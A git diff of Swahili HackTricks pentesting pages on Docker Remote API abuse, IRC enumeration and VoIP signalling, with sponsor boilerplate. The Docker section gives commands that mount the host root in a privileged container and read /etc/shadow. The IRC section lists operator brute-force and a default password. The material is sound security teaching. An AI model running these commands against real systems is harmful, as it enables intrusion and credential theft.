* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
### Misingi ya Docker
#### Ni Nini
Docker ni **jukwaa la mbele** katika **tasnia ya kubebeshaji**, likiongoza **ubunifu endelevu**. Inarahisisha uundaji na usambazaji wa programu, kutoka **za jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwa mazingira mbalimbali.
Docker ni **jukwaa kuu** katika tasnia ya **containerization**, likiongoza **uvumbuzi endelevu**. Inarahisisha uumbaji na usambazaji wa maombi, kutoka kwa **jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwa mazingira mbalimbali.
#### Mimarathi ya msingi ya Docker
#### Miundo ya msingi ya Docker
* [**containerd**](http://containerd.io): Hii ni **msingi wa msingi** kwa kontena, ikishughulikia **usimamizi kamili wa mzunguko wa maisha ya kontena**. Hii inajumuisha kushughulikia **hamisha na uhifadhi wa picha**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**.
* **Container-shim** inacheza jukumu muhimu kama **mwendeshaji wa kati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua nafasi ya **runc** baada ya kontena kuanzishwa.
* [**runc**](http://runc.io): Inaheshimiwa kwa uwezo wake wa **mwendeshaji wa kontena mwepesi na wa ulimwengu mzima**, runc inalingana na **kiwango cha OCI**. Inatumika na containerd kuanzisha na kusimamia kontena kulingana na **mwongozo wa OCI**, ikiwa imeendelea kutoka kwa **libcontainer** ya awali.
* [**containerd**](http://containerd.io): Hii ni **runtime msingi** kwa kontena, ikishughulikia **usimamizi wa kina wa mzunguko wa maisha ya kontena**. Hii inajumuisha kushughulikia **hamisha na uhifadhi wa picha**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**.
* **container-shim** inacheza jukumu muhimu kama **mwendeshaji wa kati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua kwa urahisi kutoka kwa **runc** baada ya kontena kuanzishwa.
* [**runc**](http://runc.io): Inaheshimiwa kwa uwezo wake wa **runtime wa kontena wa mwanga na wa kipekee**, runc inalingana na **kiwango cha OCI**. Inatumika na containerd kuanzisha na kusimamia kontena kulingana na **mwongozo wa OCI**, ikibadilika kutoka kwa **libcontainer** ya awali.
* [**grpc**](http://www.grpc.io) ni muhimu kwa **kurahisisha mawasiliano** kati ya containerd na **docker-engine**, ikihakikisha **mwingiliano wenye ufanisi**.
* [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **maelezo ya OCI** kwa muda wa mzunguko na picha, na toleo la hivi karibuni la Docker linazingatia viwango vya **picha na mzunguko wa OCI**.
* [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **maelezo ya OCI** kwa runtime na picha, na toleo jipya la Docker likiwa **linazingatia viwango vya picha na runtime** vya OCI vyote.
#### Amri za Msingi
```bash
@ -53,9 +67,9 @@ docker system prune -a
```
#### Containerd
**Containerd** ilibuniwa kwa kusudi maalum la kutumikia mahitaji ya majukwaa ya vyombo kama **Docker na Kubernetes**, miongoni mwa mengine. Lengo lake ni **kutia rahisi utekelezaji wa vyombo** kwenye mifumo tofauti ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na zaidi, kwa kuficha utendaji maalum wa mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, kujaribu kuacha sehemu zisizo za lazima. Hata hivyo, kufikia lengo hili kikamilifu kunatambuliwa kuwa changamoto.
**Containerd** ilibuniwa kwa kusudi maalum la kutumikia mahitaji ya majukwaa ya vyombo kama **Docker na Kubernetes**, miongoni mwa mengine. Lengo lake ni **kurahisisha utekelezaji wa vyombo** kwenye mifumo tofauti ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na zaidi, kwa kuficha utendaji maalum wa mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, kwa lengo la kuacha sehemu zisizo za lazima. Hata hivyo, kutimiza lengo hili kikamilifu kunatambuliwa kuwa changamoto.
Uamuzi muhimu wa kubuni ni kwamba **Containerd haitumii usimamizi wa mtandao**. Mtandao unachukuliwa kuwa kipengele muhimu katika mifumo iliyosambazwa, na ugumu kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambao hutofautiana sana kutoka jukwaa moja hadi lingine. Kwa hivyo, Containerd inaacha sehemu za mtandao zisimamiwe na majukwaa inayounga mkono.
Uamuzi muhimu wa kubuni ni kwamba **Containerd haitumii usanidi wa mtandao**. Mtandao unachukuliwa kuwa sehemu muhimu katika mifumo iliyosambazwa, na ugumu kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambao hutofautiana sana kutoka jukwaa moja hadi lingine. Kwa hivyo, Containerd inaacha vipengele vya mtandao kusimamiwa na majukwaa inayounga mkono.
Wakati **Docker inatumia Containerd** kutekeleza vyombo, ni muhimu kutambua kwamba Containerd inasaidia tu sehemu ya utendaji wa Docker. Kwa kusisitiza, Containerd haina uwezo wa usimamizi wa mtandao uliopo kwenye Docker na haisaidii uundaji wa makundi ya Docker moja kwa moja. Tofauti hii inaonyesha jukumu lililolengwa la Containerd kama mazingira ya utekelezaji wa vyombo, ikipeleka vipengele vilivyospecializika zaidi kwa majukwaa inayoshirikiana nayo.
```bash
@ -75,20 +89,20 @@ ctr container delete <containerName>
```
#### Podman
**Podman** ni injini ya kontena ya chanzo wazi inayofuata [viwango vya Open Container Initiative (OCI)](https://github.com/opencontainers), iliyoendelezwa na kudumishwa na Red Hat. Inatofautiana na Docker kwa kuwa na sifa kadhaa tofauti, hasa usanifu wake wa **bila daemon** na msaada kwa **kontena za bila root**, kuruhusu watumiaji kuendesha kontena bila mamlaka ya root.
**Podman** ni injini ya kontena ya chanzo wazi inayofuata [viwango vya Open Container Initiative (OCI)](https://github.com/opencontainers), iliyoendelezwa na kudumishwa na Red Hat. Inatofautiana na Docker kwa kuwa na sifa kadhaa tofauti, hasa usanifu wake wa **bila daemon** na msaada kwa **kontena za bila root**, kuruhusu watumiaji kuendesha kontena bila mamlaka ya mzizi.
Podman imeundwa kuwa sawa na API ya Docker, kuruhusu matumizi ya amri za Docker CLI. Ulinganifu huu unajumuisha mfumo wake, ambao unajumuisha zana kama **Buildah** kwa kujenga picha za kontena na **Skopeo** kwa operesheni za picha kama vile kusukuma, kuvuta, na kupekua. Maelezo zaidi kuhusu zana hizi yanaweza kupatikana kwenye [ukurasa wao wa GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
**Tofauti Kuu**
* **Usanifu**: Tofauti na mfano wa mteja-seva wa Docker na daemon wa nyuma, Podman inafanya kazi bila daemon. Usanifu huu unamaanisha kontena zinaendeshwa na mamlaka za mtumiaji anayeziendesha, kuimarisha usalama kwa kutokuwa na haja ya ufikiaji wa root.
* **Usanifu**: Tofauti na mfano wa mteja-seva wa Docker na daemon ya nyuma, Podman inafanya kazi bila daemon. Usanifu huu unamaanisha kontena zinaendeshwa na mamlaka za mtumiaji anayeziendesha, kuimarisha usalama kwa kutokuwa na haja ya ufikiaji wa mzizi.
* **Uingizaji wa systemd**: Podman inaingiliana na **systemd** kusimamia kontena, kuruhusu usimamizi wa kontena kupitia vitengo vya systemd. Hii inatofautiana na matumizi ya Docker ya systemd hasa kwa kusimamia mchakato wa daemon wa Docker.
* **Kontena za Bila Root**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha kontena chini ya mamlaka ya mtumiaji anayeanzisha. Hatua hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kuwa wachomaji wanapata mamlaka tu ya mtumiaji aliyeathiriwa, sio ufikiaji wa root.
* **Kontena za Bila Root**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha kontena chini ya mamlaka ya mtumiaji anayeanzisha. Mbinu hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kuwa wachomozaji wanapata mamlaka tu ya mtumiaji aliyeathiriwa, sio ufikiaji wa mzizi.
Mbinu ya Podman inatoa mbadala salama na mpana kwa Docker, ikisisitiza usimamizi wa mamlaka ya mtumiaji na ufanisi na mifumo ya kazi ya Docker iliyopo.
{% hint style="info" %}
Tafadhali kumbuka kwamba kwa kuwa podam inalenga kusaidia API ile ile kama docker, unaweza kutumia amri sawa na podman kama vile na docker kama vile:
Tafadhali kumbuka kwamba kwa kuwa podman inalenga kusaidia API ile ile kama docker, unaweza kutumia amri sawa na podman kama vile na docker kama vile:
```bash
podman --version
podman info
@ -99,7 +113,7 @@ podman ls
### Taarifa Msingi
Remote API inaendeshwa kwa chaguo-msingi kwenye bandari ya 2375 wakati imezimwa. Huduma kwa chaguo-msingi haitahitaji uthibitisho kuruhusu mshambuliaji kuanza kontena la docker lenye mamlaka. Kwa kutumia Remote API mtu anaweza kuambatanisha wenyeji / (saraka kuu) kwa kontena na kusoma/kuandika faili za mazingira ya mwenyeji.
Remote API inaendeshwa kwa chaguo-msingi kwenye bandari ya 2375 wakati imezimwa. Huduma kwa chaguo-msingi haitahitaji uthibitisho, ikiruhusu mshambuliaji kuanza kontena ya docker yenye mamlaka. Kwa kutumia Remote API mtu anaweza kuunganisha mwenyeji / (saraka kuu) kwa kontena na kusoma/kuandika faili za mazingira ya mwenyeji.
**Bandari ya chaguo-msingi:** 2375
```
@ -158,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
Wakati mwingine utaona **2376** ukiwa juu kwa **TLS** endpoint. Sijaweza kuunganisha na mteja wa docker lakini inawezekana kufanya hivyo na curl.
Wakati mwingine utaona **2376** ikiwa wazi kwa **TLS** endpoint. Sijaweza kuunganisha na mteja wa docker lakini inawezekana kufanya hivyo na curl.
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -188,7 +202,7 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
#Delete stopped containers
curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
```
Ikiwa unataka habari zaidi kuhusu hili, habari zaidi inapatikana mahali niliponakili amri kutoka: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
Ikiwa unataka habari zaidi kuhusu hili, habari zaidi inapatikana mahali niliponakili amri hizi: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
#### Moja kwa moja
```bash
@ -203,16 +217,16 @@ Kwenye ukurasa ufuatao unaweza kupata njia za **kutoroka kutoka kwa chombo cha d
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
{% endcontent-ref %}
Kwa kuitumia hii, niwezekanavyo kutoroka kutoka kwa chombo, unaweza kuendesha chombo dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kuzingirwa kwa mashine:
Kwa kuitumia hii, niwezekana kutoroka kutoka kwa chombo, unaweza kuendesha chombo dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kuzingirwa kwenye mashine:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
### Kuboresha Mamlaka
### Kupanda Mamlaka
Ikiwa uko ndani ya mwenyeji anayetumia docker, unaweza [**soma habari hii jaribu kuinua mamlaka**](../linux-hardening/privilege-escalation/#writable-docker-socket).
Ikiwa uko ndani ya mwenyeji anayetumia docker, unaweza [**kusoma habari hii jaribu kuinua mamlaka**](../linux-hardening/privilege-escalation/#writable-docker-socket).
### Kugundua siri katika kontena za Docker zinazoendesha
```bash
@ -275,7 +289,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
#### Kurekodi Shughuli Zenye Mashaka
* Unaweza kutumia zana [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) kugundua **tabia zenye mashaka kwenye vyombo vinavyotekelezwa**.
* Tafadhali angalia kipande kifuatacho jinsi **Falco inakusanya moduli ya kernel na kuweka**. Baada ya hapo, inapakia sheria na **anza kurekodi shughuli zenye mashaka**. Katika kesi hii, imetambua vyombo 2 vilivyo na mamlaka vilivyoanzishwa, 1 kati yao ikiwa na kiunganishi nyeti, na baada ya sekunde kadhaa iligundua jinsi ganda lilivyoanzishwa ndani ya moja ya vyombo.
* Tafadhali angalia sehemu ifuatayo jinsi **Falco inakusanya moduli ya kernel na kuweka**. Baada ya hapo, inapakia sheria na **kuanza kurekodi shughuli zenye mashaka**. Katika kesi hii, imedokeza vyombo 2 vilivyo na mamlaka vilivyoanzishwa, 1 kati yao na kufunga nyeti, na baada ya sekunde kadhaa iligundua jinsi ganda lilivyofunguliwa ndani ya moja ya vyombo.
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -325,6 +339,20 @@ Unaweza kutumia auditd kufuatilia docker.
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -333,8 +361,8 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,28 +1,42 @@
# 194,6667,6660-7000 - Kupima Udukuzi wa IRC
# 194,6667,6660-7000 - Kupima IRC
<details>
<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochochewa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
IRC, awali **itifaki ya maandishi wazi**, ilipewa **194/TCP** na IANA lakini kawaida inaendeshwa kwenye **6667/TCP** na bandari kama hizo kuepuka kuhitaji **mamlaka ya mizizi** kwa uendeshaji.
IRC, awali **itifaki ya maandishi ya kawaida**, ilipewa **194/TCP** na IANA lakini kawaida inaendeshwa kwenye **6667/TCP** na bandari sawa ili kuepuka kuhitaji **mamlaka ya msingi** kwa uendeshaji.
**Jina la utani** ndilo linalohitajika kuunganisha kwenye seva. Baada ya kuunganisha, seva inafanya utafutaji wa DNS ya nyuma kwenye anwani ya IP ya mtumiaji.
**Jina la utani** ndilo linalohitajika kuunganisha kwenye seva. Baada ya kuunganisha, seva hufanya utafutaji wa DNS wa kurudi kwa IP ya mtumiaji.
Watumiaji wanagawanywa katika **waendeshaji**, ambao wanahitaji **jina la mtumiaji** na **nywila** kwa ufikiaji zaidi, na **watumiaji wa kawaida**. Waendeshaji wana viwango tofauti vya mamlaka, na waadmini wako juu.
Watumiaji wanagawanywa katika **waendeshaji**, ambao wanahitaji **jina la mtumiaji** na **nywila** kwa ufikiaji zaidi, na **watumiaji wa kawaida**. Waendeshaji wana viwango tofauti vya mamlaka, na waendeshaji wa mfumo wako juu.
**Bandari za chaguo-msingi:** 194, 6667, 6660-7000
**Bandari za msingi:** 194, 6667, 6660-7000
```
PORT STATE SERVICE
6667/tcp open irc
@ -38,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
```
### Mwongozo
Hapa unaweza kuona jinsi ya kuunganisha na kupata upatikanaji wa IRC ukitumia **jina la utani lisilojulikana** na kisha kuchunguza habari muhimu. Unaweza kujifunza amri zaidi za IRC [hapa](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
Hapa unaweza kuona jinsi ya kuunganisha na kupata upatikanaji wa IRC ukitumia **jina la kupotosha** kisha kuchunguza taarifa za kuvutia. Unaweza kujifunza amri zaidi za IRC [hapa](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
```bash
#Connection with random nickname
USER ran213eqdw123 0 * ran213eqdw123
@ -67,48 +81,45 @@ JOIN <CHANNEL_NAME> #Connect to a channel
#Operator creds Brute-Force
OPER <USERNAME> <PASSWORD>
```
Unaweza, pia, kujaribu kuingia kwenye seva kwa kutumia nenosiri. Nenosiri la chaguo-msingi kwa ngIRCd ni `wealllikedebian`.
Unaweza, pia, kujaribu kuingia kwenye seva kwa kutumia nenosiri. Nenosiri la chaguo kwa ngIRCd ni `wealllikedebian`.
```bash
PASS wealllikedebian
NICK patrick
USER test1 test2 <IP> :test3
```
### **Tafuta na skani huduma za IRC**
IRC (Internet Relay Chat) ni mfumo wa mazungumzo ya moja kwa moja kupitia mtandao. IRC inatumia itifaki ya TCP/IP na inaruhusu watumiaji kuwasiliana na kubadilishana ujumbe kwenye vituo vya mazungumzo vilivyoundwa. IRC inaweza kutumiwa kwa mawasiliano ya kibinafsi au kwa mazungumzo ya kikundi.
Kabla ya kuanza kuchunguza huduma za IRC, unahitaji kujua anwani ya IP ya seva ya IRC unayotaka kuchunguza. Unaweza kutumia zana kama `nslookup` au `dig` ili kupata anwani ya IP ya seva.
Baada ya kupata anwani ya IP, unaweza kuanza skani ya huduma za IRC kwa kutumia zana kama `nmap`. Skani ya kawaida ya IRC inaweza kufanywa kwa kutumia amri ifuatayo:
```
nmap -p 6667 <IP_address>
```
Amri hii itascan bandari ya 6667 kwenye anwani ya IP iliyotolewa. Bandari ya 6667 ni bandari ya kawaida inayotumiwa na huduma za IRC.
Baada ya kukamilisha skani, unaweza kupata habari kuhusu huduma za IRC zinazopatikana kwenye seva. Unaweza kutumia zana kama `telnet` au mteja wa IRC kama `irssi` ili kuunganisha na seva na kuchunguza vituo vya mazungumzo vilivyopo.
Kumbuka kwamba kuchunguza huduma za IRC bila idhini inaweza kuwa kinyume cha sheria. Hakikisha unafuata sheria na kanuni zinazohusiana na uchunguzi wa kisheria na usalama wa mtandao.
```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#irc)
### [Kujaribu Kuvunja](../generic-methodologies-and-resources/brute-force.md#irc)
### Shodan
* `kutafuta jina lako la mwenyeji`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) **na** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **repos za github.**
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -6,82 +6,115 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Itifaki za Ishara
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Itifaki za Kutia Saini
### SIP (Itifaki ya Kuanzisha Kikao)
Hii ni kiwango cha tasnia, kwa habari zaidi angalia:
Hii ni kiwango cha viwanda, kwa maelezo zaidi angalia:
{% content-ref url="sip-session-initiation-protocol.md" %}
[sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
{% endcontent-ref %}
### MGCP (Itifaki ya Kudhibiti Lango la Vyombo vya Habari)
### MGCP (Itifaki ya Kudhibiti Geti la Vyombo vya Habari)
MGCP (Itifaki ya Kudhibiti Lango la Vyombo vya Habari) ni **itifaki ya ishara** na **kudhibiti wito** iliyoelezwa katika RFC 3435. Inafanya kazi katika muundo uliojumuishwa, ambao una sehemu kuu tatu:
MGCP (Itifaki ya Kudhibiti Geti la Vyombo vya Habari) ni **itifaki ya kutia saini** na **kudhibiti simu** iliyoelezwa katika RFC 3435. Inafanya kazi katika muundo uliojikita, ambao una sehemu kuu tatu:
